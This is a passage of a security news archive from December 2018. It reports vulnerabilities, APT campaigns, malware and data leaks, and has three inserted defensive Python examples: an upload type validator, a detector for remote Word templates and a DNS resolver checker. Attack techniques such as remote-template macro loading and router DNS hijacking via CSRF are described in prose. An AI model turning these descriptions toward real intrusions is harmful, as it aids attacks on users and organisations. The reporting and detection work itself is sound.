Category Archives: Breaking News

Magellan RCE flaw in SQLite potentially affects billions of apps

Security experts at Tencent’s Blade security team discovered the Magellan RCE flaw in SQLite database software that exposes billions of vulnerable apps.

Security experts at Tencent’s Blade security team have discovered a critical vulnerability in SQLite database software that exposes billions of vulnerable apps to hackers.

The vulnerability, tracked as ‘Magellan’, could allow remote attackers to execute arbitrary code on vulnerable devices, leak program memory, or cause a denial-of-service condition by crashing the application.

“Magellan is a remote code execution vulnerability discovered by Tencent Blade Team that exists in SQLite. As a well-known database, SQLite is widely used in all modern mainstream operating systems and software, so this vulnerability has a wide range of influence.” reads a blog post published by the Tencent Blade Team.

SQLite is a widely adopted relational database management system contained in a C programming library. Unlike many other database management systems, SQLite is not a client–server database engine. Rather, it is embedded into the end program.

SQLite is used by millions of applications with billions of installs, so Magellan potentially affects IoT devices as well as macOS and Windows apps.

Experts also tested Chromium and discovered it was affected too; Google has confirmed and fixed the issue.

Chromium-based web browsers such as Google Chrome, Opera, Vivaldi, and Brave also support SQLite through the deprecated Web SQL database API.

Experts warn that a remote attacker could easily target people using vulnerable browsers by tricking them into visiting a specially crafted web page.

“After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability. We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible.” continues the post.

SQLite version 3.26.0 addresses the Magellan flaw. Google released Chromium version 71.0.3578.80 to fix the issue, and the patched version has been rolled out in the latest releases of the Google Chrome and Brave web browsers.

The Tencent experts said they successfully built a proof-of-concept exploit for the Magellan flaw that worked against Google Home.

Experts did not disclose the exploit to allow development teams to address flawed applications. The good news is that experts have not seen attacks abusing the Magellan flaw yet.

Users and administrators have to update their systems and vulnerable applications as soon as possible.

Pierluigi Paganini

(Security Affairs – Magellan flaw, hacking)

The post Magellan RCE flaw in SQLite potentially affects billions of apps appeared first on Security Affairs.

A bug in Facebook Photo API exposed photos of 6.8 Million users

New problems for Facebook: the social network giant announced that a bug in its Photo API could have allowed third-party apps to access users’ photos.

Facebook announced that photos of 6.8 million users might have been exposed by a bug in the Photo API that allowed third-party apps to access them. The bug involved apps from over 870 developers, but only apps the user had already granted access to their photos could have exploited it. According to Facebook, the flaw exposed user photos for 12 days, between September 13 and September 25, 2018.

The flaw was discovered by the Facebook internal team and impacted users who had utilized Facebook Login and allowed third-party apps to access their photos.

“Our internal team discovered a photo API bug that may have affected people who used Facebook Login and granted permission to third-party apps to access their photos. We have fixed the issue but, because of this bug, some third-party apps may have had access to a broader set of photos than usual for 12 days between September 13 to September 25, 2018.” reads a post published by Facebook.

Normally, applications granted access to photos can access only images shared on a user’s timeline. The bug could also have exposed other photos, including ones shared on Facebook Marketplace or via Stories, and even photos that were only uploaded but never posted.

“Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos.” continues the post.

Facebook is notifying impacted people via an alert in their account.

“We’re sorry this happened. Early next week we will be rolling out tools for app developers that will allow them to determine which people using their app might be impacted by this bug. We will be working with those developers to delete the photos from impacted users.” concludes Facebook.

“We will also notify the people potentially impacted by this bug via an alert on Facebook. The notification will direct them to a Help Center link where they’ll be able to see if they’ve used any apps that were affected by the bug.”

Pierluigi Paganini

(Security Affairs – Facebook, privacy)

WordPress version 5.0.1 addressed several vulnerabilities

On Thursday, the WordPress development team released version 5.0.1 of the popular CMS, which addresses several flaws.

The researcher Tim Coen discovered several cross-site scripting (XSS) vulnerabilities in the CMS. One of the flaws is caused by the ability of contributors to edit new comments from users with higher privileges. Coen also discovered that it is possible to trigger XSS flaws by using specially crafted URL input against some plugins.

Coen, along with the researcher Slavco Mihajloski, discovered an XSS vulnerability that allows authors on websites running on Apache servers to upload specially crafted files that bypass MIME verification.

“Prior to 5.0.1, WordPress did not require uploaded files to pass MIME type verification, so files could be uploaded even if the contents didn’t match the file extension. For example, a binary file could be uploaded with a .jpg extension,” wrote WordPress developer Ian Dunn. “This is no longer the case, and the content of uploaded files must now match their extension. Most valid files should be unaffected, but there may be cases when a file needs to be renamed to its correct extension (e.g., an OpenOffice doc going from .pptx to .ppxs).”
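A content check of the kind the 5.0.1 change introduces, written here as an added Python example rather than WordPress’s own code: it compares an upload’s leading bytes with the signature expected for its extension and rejects, for instance, a binary uploaded as .jpg. The signature table is a minimal constructed one and the sample uploads are constructed inline.

```python
"""Reject uploads whose content does not match the declared file extension.

Added example, not WordPress code: the signature table and the sample
uploads below are constructed for illustration.
"""
from typing import Dict, List, Set, Tuple

# Leading bytes ("magic numbers") that identify each allowed type.
MAGIC: Dict[str, Tuple[bytes, ...]] = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
    # OOXML documents are ZIP containers; leading bytes identify only the
    # container, so the three Office extensions share one signature.
    "docx": (b"PK\x03\x04",),
    "xlsx": (b"PK\x03\x04",),
    "pptx": (b"PK\x03\x04",),
}


def extension_of(filename: str) -> str:
    """Lower-cased extension without the dot, or '' if there is none."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def detected_types(data: bytes) -> Set[str]:
    """Extensions whose signature matches the start of the content."""
    return {ext for ext, sigs in MAGIC.items() if data.startswith(sigs)}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Accept only when the content's signature agrees with the extension.

    Returns (accepted, reason). An unknown extension is refused rather than
    guessed, and every rejection reports what the bytes look like so that a
    legitimate but misnamed file can be renamed and re-uploaded.
    """
    ext = extension_of(filename)
    found = detected_types(data)
    if ext not in MAGIC:
        hint = f" (content looks like {'/'.join(sorted(found))})" if found else ""
        return False, f"extension .{ext or '<none>'} is not allowed{hint}"
    if ext in found:
        return True, "ok"
    if found:
        return False, f"content looks like {'/'.join(sorted(found))}, not .{ext}"
    return False, "content does not match any allowed type"


# Constructed sample uploads: a recognisable header followed by filler.
SAMPLE_UPLOADS: List[Tuple[str, bytes]] = [
    ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16),
    # A Windows executable header behind an image extension: the case the
    # 5.0.1 change is meant to stop.
    ("binary.jpg", b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 16),
    ("deck.pptx", b"PK\x03\x04\x14\x00\x06\x00" + b"\x00" * 16),
    # A valid document under an unrecognised extension has to be renamed.
    ("notes.ppxs", b"PK\x03\x04\x14\x00\x06\x00" + b"\x00" * 16),
    ("banner.gif", b"GIF89a\x01\x00\x01\x00" + b"\x00" * 16),
]


def check_all(uploads=SAMPLE_UPLOADS) -> Dict[str, Tuple[bool, str]]:
    """Validate every sample and map filename to its verdict."""
    return {name: validate_upload(name, data) for name, data in uploads}


if __name__ == "__main__":
    for name, (accepted, reason) in check_all().items():
        print(f"{'ACCEPT' if accepted else 'REJECT'} {name}: {reason}")
```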

Another flaw, discovered by experts at Yoast, affects some uncommon configurations and causes the user activation screen to be indexed by search engines. This could lead to the exposure of email addresses and, in “some rare cases,” default passwords.

Karim El Ouerghemmi discovered a security issue that allows authors to alter metadata and delete files that they would not normally be authorized to delete.

Security expert Sam Thomas discovered that contributors could use specially crafted metadata for PHP object injection.

The last flaw was discovered by Simon Scannell from RIPS Technologies; it could be exploited by authors using specially crafted input to create posts of unauthorized types.

Security updates that addressed the above flaws have been released for WordPress 4.9 and older releases. Version 5.0 already includes the fixes.

Pierluigi Paganini

(Security Affairs – WordPress, security)

New Sofacy campaign aims at Government agencies across the world

Security experts at Palo Alto Networks uncovered a new espionage campaign carried out by the Russia-linked APT group Sofacy.

The Russian cyber espionage group Sofacy (aka APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) carried out a new cyber campaign aimed at government agencies on four continents in an attempt to infect them with malware.

The campaign has been focusing on Ukraine and NATO members, as the group has done in past attacks.

In early December the group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial Brexit draft agreement with the European Union (EU). In November, experts at Palo Alto Networks documented a new malware, dubbed Cannon, used in attacks on government entities worldwide.

The latest campaign documented by Palo Alto Networks was carried out from mid-October through mid-November; the attackers used both the Zebrocy backdoor and the Cannon Trojan.

Researchers noticed that in all the attacks the threat actors used decoy documents bearing the same author name, Joohn.

“The delivery documents used in the October and November waves shared a large number of similarities, which allowed us to cluster the activity together. Most notably, the author name Joohn was used repeatedly in each delivery document.” reads the analysis published by Palo Alto Networks.

“There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field.”

Palo Alto Networks identified a total of 9 documents and associated payloads and targets.

Once a document is opened, it leverages Microsoft Word’s ability to retrieve a remote template, which then loads a malicious macro document.

“If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session.” continues the report.

“The victim will then see a prompt to Enable Content as with any malicious macro document. If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded.”
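The remote-template request described above is declared inside the document package itself, so it can be spotted before Word ever contacts the server. The following Python check is an added example, not code from the Palo Alto Networks report: it flags a .docx whose settings relationships declare an external attachedTemplate. The sample documents are constructed inline and the template URL is a placeholder, not an indicator from the campaign.

```python
"""Flag Word documents that ask Word to fetch a remote (external) template.

Added example; the sample document bytes are constructed inline and the
template URL is a placeholder, not an indicator from the report.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    "attachedTemplate"
)
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def remote_templates(docx_bytes: bytes) -> List[str]:
    """Return the external attachedTemplate targets declared in a .docx/.dotm.

    Word resolves the template relationship when the document is opened; an
    External relationship whose target is a URL or UNC path is what lets a
    plain-looking document pull a macro-bearing template from a server.
    An empty list means no remote template is requested.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(SETTINGS_RELS))

    hits: List[str] = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        external = rel.get("TargetMode") == "External"
        # Be conservative: a URL- or UNC-shaped target is reported even if
        # the TargetMode attribute is missing.
        looks_remote = target.lower().startswith(("http://", "https://", "\\\\"))
        if external or looks_remote:
            hits.append(target)
    return hits


def build_sample_docx(template_target: Optional[str], external: bool) -> bytes:
    """Constructed minimal .docx containing only the parts the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        )
        if template_target is not None:
            mode = ' TargetMode="External"' if external else ""
            zf.writestr(
                SETTINGS_RELS,
                f'<Relationships xmlns="{RELS_NS}">'
                f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                f'Target="{template_target}"{mode}/>'
                "</Relationships>",
            )
    return buf.getvalue()


def triage(samples: List[Tuple[str, bytes]]) -> Dict[str, List[str]]:
    """Map each sample name to the remote templates it declares."""
    return {name: remote_templates(data) for name, data in samples}


# Constructed samples: a remote template (placeholder URL), a local
# template as a normal document would declare, and no template at all.
SAMPLES: List[Tuple[str, bytes]] = [
    ("remote.docx", build_sample_docx("http://template.example.invalid/t.dotm", True)),
    ("local.docx", build_sample_docx("Normal.dotm", False)),
    ("plain.docx", build_sample_docx(None, False)),
]

if __name__ == "__main__":
    for name, targets in triage(SAMPLES).items():
        verdict = "REMOTE TEMPLATE" if targets else "ok"
        print(f"{name}: {verdict} {targets}")
```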

Sofacy bait

The latest Sofacy campaign hit targets around the world, including a foreign affairs organization in North America, foreign affairs organizations in Europe, and government entities in former USSR states. Experts also discovered evidence of possible targeting of local law enforcement agencies worldwide (North America, Australia, and Europe).

Palo Alto Networks reveals that, in addition to the delivery documents themselves, the remote templates too shared a common author name. The security researchers also noticed that the servers hosting the remote templates also hosted the C&C for the first-stage payloads.

The Sofacy attackers used different variants of the Zebrocy malware and the Cannon backdoor. Palo Alto Networks identified a Cannon variant written in Delphi and Zebrocy variants written in C# and VB.NET.

“The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques.” concludes the analysis.

“The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks. The group continues to develop new variations of Zebrocy by adding a VB.NET and C# version, and it appears that they also have used different variants of the Cannon tool in past attack campaigns.”

Pierluigi Paganini

(Security Affairs – Sofacy, cyber espionage)

French foreign ministry announced its Travel Alert Registry Hack

The French foreign ministry announced today that its travel alert registry website had been hacked and personal data of citizens “could be misused”.

The French foreign ministry confirmed that hackers breached the Ariane system, its travel alert registry website, and that personal data of citizens “could be misused”.

The Ariane system provides security alerts to registered users when they travel abroad. At the time of writing there are no technical details about the intrusion or the number of affected people.

“Users reported receiving emails notifying them that their names, cellphone numbers and email addresses may have been stolen, but the ministry said none of the data was ‘sensitive’ or ‘of a financial nature’.” reported AFP.

The statement did not indicate who might be behind the attack.

The ministry started notifying affected users of the incident and told the media it had taken the necessary measures to avoid similar incidents in the future.

“We immediately took the necessary measures to ensure this type of incident would not happen again,” it said.

The Ministry confirmed that the site was now secured.

Pierluigi Paganini

(Security Affairs – Travel Alert Registry, hacking)

Operation Sharpshooter targets critical infrastructure and global defense

McAfee uncovered a campaign tracked as Operation Sharpshooter that hit at least 87 organizations in global defense and critical infrastructure.

Security experts at McAfee uncovered a hacking campaign, tracked as Operation Sharpshooter, aimed at infrastructure companies worldwide. The threat actors are using malware associated with the Lazarus APT group, which carried out the Sony Pictures attack in 2014.

The current campaign is targeting nuclear, defense, energy, and financial companies; experts believe the attackers are gathering intelligence to prepare future attacks.

“In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis.” reads the analysis published by McAfee.

“Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest.”

Operation Sharpshooter

The threat actors are carrying out spear phishing attacks with a link pointing to weaponized Word documents purporting to come from a job recruiter. The messages are in English and include descriptions of jobs at unnamed companies; the URLs associated with the documents belong to a US-based IP address and to the Dropbox service.

The macros included in the malicious document use embedded shellcode to inject the Sharpshooter downloader into Word’s memory.

The macros act as a downloader for a second-stage implant dubbed Rising Sun, which runs in memory and collects intelligence about the machine (network adapter information, computer name, username, IP address information, OS information, drive and process information, and other native system data). Rising Sun implements tens of backdoor capabilities, including the ability to terminate processes and write files to disk.

The binary is downloaded to the startup folder to gain persistence on the infected system. Experts observed that the attackers behind Operation Sharpshooter also download a second, harmless Word document from the control server, most likely as a decoy to hide the malware.

The malware sends the collected data to the C2 server in encrypted form: it encrypts the data with the RC4 algorithm and then Base64-encodes the result.

The control infrastructure is composed of servers located in the US, Singapore, and France.

Experts highlighted that Rising Sun uses source code from the Trojan Duuzer, a backdoor used by the Lazarus Group in the Sony attacks.

“This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.” continues the report.

Experts found other similarities, for example the documents that are being used to distribute Rising Sun contain metadata indicating they were created using a Korean-language version of Word.

Experts found many similarities between the malware used in Operation Sharpshooter and the one used in the Sony hack; they also found similarities between the tactics, techniques, and procedures used by the attackers and those of the Lazarus Group.

Experts believe that threat actors behind Operation Sharpshooter are planting false flags to make attribution more difficult.

Further details on the campaign, including IoCs, are reported in the analysis published by McAfee.

Pierluigi Paganini

(Security Affairs – Operation Sharpshooter, hacking)

ID Numbers for 120 Million Brazilian taxpayers exposed online

InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers for 120 million Brazilian taxpayers.

In March 2018, security experts at InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers, or Cadastro de Pessoas Físicas (CPFs), for 120 million Brazilian nationals. It is not clear how long the data remained exposed online or who accessed it.

Every Brazilian national is assigned a taxpayer identification number, which is required for ordinary operations such as opening a bank account, paying taxes, or getting a loan.

Experts discovered the file index.html_bkp on the Apache server (likely a backup of index.html); as a result, the web server displayed a listing of the files and folders stored in that directory and allowed them to be downloaded.

The folder included data archives ranging in size from 27 megabytes to 82 gigabytes.

Experts at InfoArmor discovered that one of the archives contained data related to Cadastro de Pessoas Físicas (CPFs), personal information, military information, telephone numbers, loans, and addresses.

“CPFs are an identification number issued by the Brazilian Federal Reserve to Brazilian citizens and tax-paying resident aliens, and each exposed CPF linked to an individual’s banks, loans, repayments, credit and debit history, voting history, full name, emails, residential addresses, phone numbers, date of birth, family contacts, employment, voting registration numbers, contract numbers, and contract amounts.” reads the report published by InfoArmor.

Experts believe the directory was used to store database backups. While InfoArmor was attempting to report the discovery to the owner of the database, someone replaced the 82 GB file with a raw 25 GB .sql file.

“In the days following the initial discovery, InfoArmor’s research team attempted to determine who owned the server so they could be notified. During this time, InfoArmor observed that one of the files, an 82 GB file, had been replaced by a raw .sql file 25 GB in size, though its filename remained the same.” continues the report.

“This swap suggests a human intervened. It is possible that a server administrator had discovered the leak, however the server remained unsecured for weeks after this swap.”

InfoArmor was nevertheless able to contact the hosting provider, which secured the directory by the end of March.

One question remains unanswered: why was this kind of data exposed on a third-party server?

“It is safe to assume that any intelligence organization or cybercrime group with reasonable collection capabilities and expertise will have captured this data. This data could very likely be used against the population of Brazil, the nation of Brazil, or any nations hosting people who have a CPF.” concludes InfoArmor.

Pierluigi Paganini

(Security Affairs – Brazilian Taxpayers, data leak)

A new variant of Shamoon was uploaded to VirusTotal while Saipem was under attack

A new variant of the Shamoon malware, aka DistTrack, was uploaded to VirusTotal from Italy this week, but experts haven’t linked it to a specific attack yet.

Shamoon was first observed in 2012 when it infected and wiped more than 30,000 systems at Saudi Aramco and other oil companies in the Middle East.

Four years later, a new version (Shamoon 2) appeared in the threat landscape; it was involved in a string of cyber attacks aimed at various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA).

A second variant of the same threat was discovered by researchers at Palo Alto Networks in January 2017 and it was able to target virtualization products.

DistTrack is able to wipe data from the hard drives of infected systems and render them unusable. Like other malware, Shamoon leverages Windows Server Message Block (SMB) to spread among systems on the target network.

The code of the original Shamoon includes a list of hard-coded domain credentials used to target a specific organization and steal credentials, but the variant uploaded to VirusTotal this week does not contain these credentials.

Google’s security firm Chronicle discovered a file containing Shamoon uploaded to its VirusTotal database.

“The new Shamoon was set to detonate on Dec. 7, 2017, at 11:51 pm, but only uploaded yesterday.” reported the Axios website.

“Chronicle notes that attackers may have set the attack date to the past — perhaps by changing 2018 to 2017 — in order to start an attack immediately. Another possibility, said Brandon Levene, head of applied intelligence at Chronicle, is that the malware was compiled in the past as part of preparations for a later attack.”

Unlike Shamoon 2, the new version contains a much longer list of filenames used for selecting the name of the dropped executable. The new list does not overlap with previously observed versions of Shamoon.

The new variant presents other anomalies; for example, the list of command and control servers was blank. Experts at Chronicle believe that the attackers may have a different way into the host network and install Shamoon manually.

Another difference is that past Shamoon versions replaced all files with images that had political significance, whereas the latest variant irreversibly encrypts the files.

The file was uploaded to VirusTotal from Italy, and the malicious files were discovered at around the time the Italian oil services company Saipem announced it had suffered a cyber attack.

“While Chronicle cannot directly link the new Shamoon variant to an active attack, the timing of the malware files comes close to news of an attack on an Italian energy corporation with assets in the Middle East.” Chronicle noted in a statement.

Pierluigi Paganini

(Security Affairs – Wiper, malware)

Cyber attack hit the Italian oil and gas services company Saipem

Some of the servers of the Italian oil and gas services company Saipem were hit by a cyber attack early this week.

 Saipem has customers in more than 60 countries, including Saudi Arabian oil and gas giant Saudi Aramco. It could be considered a strategic target for a broad range of threat actors.

The attack was identified on Monday as coming out of India and primarily affected the company’s servers in the Middle East, including Saudi Arabia, the United Arab Emirates, and Kuwait.

The main operating centers in Italy, France and Britain were not affected.

The attack affected only a limited number of servers in its infrastructure; Saipem said it is working to restore them from backups, a circumstance that could suggest the company was hit by ransomware.

Saipem told Reuters the attack originated in Chennai, India, but the identity of the attackers is unknown.

“The servers involved have been shut down for the time being to assess the scale of the attack,” Saipem’s head of digital and innovation, Mauro Piasere, told Reuters.

“There has been no loss of data because all our systems have back-ups,” he added.

The Italian oil services company Saipem confirmed it was hit by a cyber attack but has shared few details about it.

“We have no proof of the origins or reasons for the attack, though this is being investigated,” a Saipem spokesperson said via email.

“We are collecting all the elements useful for assessing the impact on our infrastructures and the actions to be taken to restore normal activities,” the firm said in a statement.

At the time of writing it is impossible to attribute the attack; it is not clear whether the company faced a targeted attack or was hit as part of a broader campaign carried out by threat actors.

We cannot exclude that the attackers hit the company in order to target its business partners too, for example Saudi Aramco, which suffered Shamoon attacks in 2012 and 2016.

Saipem told media it was reporting the incident to the competent authorities.

Pierluigi Paganini

(Security Affairs – energy industry, cyber attack)

New threat actor SandCat exploited recently patched CVE-2018-8611 0day

Experts from Kaspersky Lab reported that the recently patched Windows kernel zero-day vulnerability (CVE-2018-8611) has been exploited by several threat actors.

Microsoft’s Patch Tuesday updates for December 2018 address nearly 40 flaws, including a zero-day vulnerability affecting the Windows kernel.

The flaw, tracked as CVE-2018-8611, is a privilege escalation vulnerability caused by the failure of the Windows kernel to properly handle objects in memory.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.” reads the security advisory published by Microsoft.

“An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

The vulnerability was reported to Microsoft by researchers at Kaspersky Lab. Kudos to the Kaspersky experts, who in recent months reported two other Windows zero-days, CVE-2018-8453 and CVE-2018-8589, exploited respectively by FruityArmor and by multiple threat actors in attacks mostly aimed at the Middle East.

According to Kaspersky, CVE-2018-8611 is a race condition that resides in the Kernel Transaction Manager and, most interestingly, it could be used to escape the sandbox of the Chrome and Edge web browsers.

“CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.” reads the analysis published by Kaspersky.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Kaspersky has found several builds of the CVE-2018-8611 exploit, including one adapted for the latest versions of Windows.

The flaw was exploited by known threat actors and a recently discovered group tracked as SandCat that appears to be active in the Middle East.

SandCat was also using the FinFisher/FinSpy spyware and the CHAINSHOT malware.

According to Kaspersky, SandCat exploited the CVE-2018-8611 flaw in attacks aimed at entities in the Middle East and Africa. 

Pierluigi Paganini

(Security Affairs – SandCat, CVE-2018-8611)

The post New threat actor SandCat exploited recently patched CVE-2018-8611 0day appeared first on Security Affairs.

Novidade, a new Exploit Kit is targeting SOHO Routers

Security experts at Trend Micro have discovered a new exploit kit, dubbed Novidade (“novelty” in Portuguese), that is targeting SOHO routers to compromise the devices connected to the network equipment.

The Novidade exploit kit leverages cross-site request forgery (CSRF) to change the Domain Name System (DNS) settings of SOHO routers and redirect traffic from the connected devices to the IP address under the control of the attackers.

Since its first discovery in August 2017, experts have observed three variants of the exploit kit, including one involved in the DNSChanger system of a recent GhostDNS campaign.

Novidade is currently used in different campaigns; experts believe it has been sold to multiple threat actors or that its source code has leaked.

Most of the campaigns discovered by the researchers leverage phishing attacks to retrieve banking credentials in Brazil. Experts also observed campaigns with no specific target geolocation, a circumstance that suggests attackers are expanding their target areas or that a larger number of threat actors are using the exploit kit.

“We found Novidade being delivered through a variety of methods that include malvertising, compromised website injection, and via instant messengers.” reads the analysis published by Trend Micro.


Experts noticed that the landing page performs HTTP requests, generated by the JavaScript Image function, to a predefined list of local IP addresses commonly used by routers. Once a connection is established, the Novidade toolkit queries the IP address to download an exploit payload encoded in base64.

The exploit kit blindly attacks the detected IP address with all its exploits. 

The malicious code also attempts to log into the router with a set of default credentials and then executes a CSRF attack to change the DNS settings.

“Once the router is compromised, all devices connected to it are vulnerable to additional pharming attacks.” continues the analysis.

All the variants of Novidade exploit kit observed by Trend Micro share the same attack chain, but the latest version improves the code on the landing page and adds a new method of retrieving the victim’s local IP address. 

Below is the list of possibly affected router models, based on Trend Micro's comparison of the malicious code, network traffic, and published PoC code.

  • A-Link WL54AP3 / WL54AP2 (CVE-2008-6823)
  • D-Link DSL-2740R
  • D-Link DIR 905L
  • Medialink MWN-WAPR300 (CVE-2015-5996)
  • Motorola SBG6580
  • Realtron
  • Roteador GWR-120
  • Secutech RiS-11/RiS-22/RiS-33 (CVE-2018-10080)
  • TP-Link TL-WR340G / TL-WR340GD
  • TP-Link WR1043ND V1 (CVE-2013-2645)

Novidade was used mostly to target Brazilian users; the largest campaign has delivered the exploit kit 24 million times since March.

In September and October, Novidade was delivered through notifications on instant messengers regarding the 2018 Brazil presidential election, and through compromised websites injected with an iframe that redirects users to Novidade. The latter attack hit websites worldwide.

Trend Micro recommends keeping devices' firmware up to date, changing the default usernames and passwords on routers, and changing the router's default IP address. Disabling remote access if it is not needed is also recommended, as is using secure web connections (HTTPS) to access sensitive websites in order to prevent pharming attacks.
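A DNS changer like Novidade rewrites the router's DNS settings, so every client on the LAN is handed the attacker's resolvers by DHCP even though nothing on the host itself was modified. The following added example (not Trend Micro's code) checks the resolvers a host is actually using against an allowlist; the resolv.conf text, the 203.0.113.50 address (documentation range) and the allowlist entries are constructed for the demo.

```python
import ipaddress

# RFC 1918 ranges, checked explicitly because Python's ipaddress also treats
# documentation ranges (such as the constructed sample below) as non-global.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_nameservers(resolv_conf: str) -> list:
    """Extract the nameserver addresses from resolv.conf-style text."""
    servers = []
    for line in resolv_conf.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                servers.append(ipaddress.ip_address(parts[1]))
            except ValueError:
                continue  # malformed entry, ignore it
    return servers


def classify(addr) -> str:
    """loopback, lan (RFC 1918) or public."""
    if addr.is_loopback:
        return "loopback"
    if addr.version == 4 and any(addr in n for n in RFC1918):
        return "lan"
    return "public"


def check_resolvers(resolv_conf: str, allowed) -> list:
    """Return (nameserver, class, verdict) for every nameserver in the text.

    `allowed` is an iterable of CIDR strings; anything outside it is flagged,
    which is how a hijacked router's resolvers show up on a client.
    """
    allowed_nets = [ipaddress.ip_network(a, strict=False) for a in allowed]
    report = []
    for srv in parse_nameservers(resolv_conf):
        kind = classify(srv)
        ok = any(srv in net for net in allowed_nets)
        verdict = "expected" if ok else "suspicious: unknown %s resolver" % kind
        report.append((str(srv), kind, verdict))
    return report


# Constructed sample of what a client behind a hijacked router might see.
SAMPLE_RESOLV_CONF = """\
# Generated by DHCP
nameserver 192.168.0.1    # the router's LAN address
nameserver 203.0.113.50   # neither the ISP nor a known public resolver
nameserver not-an-ip
"""

# Allowlist assumed for the demo: the router itself plus one public resolver
# the administrator has chosen.
EXPECTED = {"192.168.0.1/32", "1.1.1.1/32"}

if __name__ == "__main__":
    for ip, kind, verdict in check_resolvers(SAMPLE_RESOLV_CONF, EXPECTED):
        print("%-16s %-9s %s" % (ip, kind, verdict))
```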

Pierluigi Paganini

(Security Affairs – Novidade exploit kit, hacking)

The post Novidade, a new Exploit Kit is targeting SOHO Routers appeared first on Security Affairs.

Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites' user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro), Switzerland (admin.ch), the websites of the Italian Ministry of Defense (difesa.it), the Israel Defense Forces (idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge), the Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italy, and many other government agencies were affected by the data compromise.

Government employees, military personnel and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total, the Group-IB Threat Intelligence system has detected more than 40 000 compromised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user account data using special spyware – form grabbers and keyloggers such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from the configuration files, databases and secret storage of more than 70 programs on the victim's computer and then sends the stolen information to the cyber criminals' C&C server. Another Trojan stealer, AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallet data. The Qbot worm gathers login credentials through the use of a keylogger, steals cookie files, certificates and active internet sessions, and forwards users to fake websites.

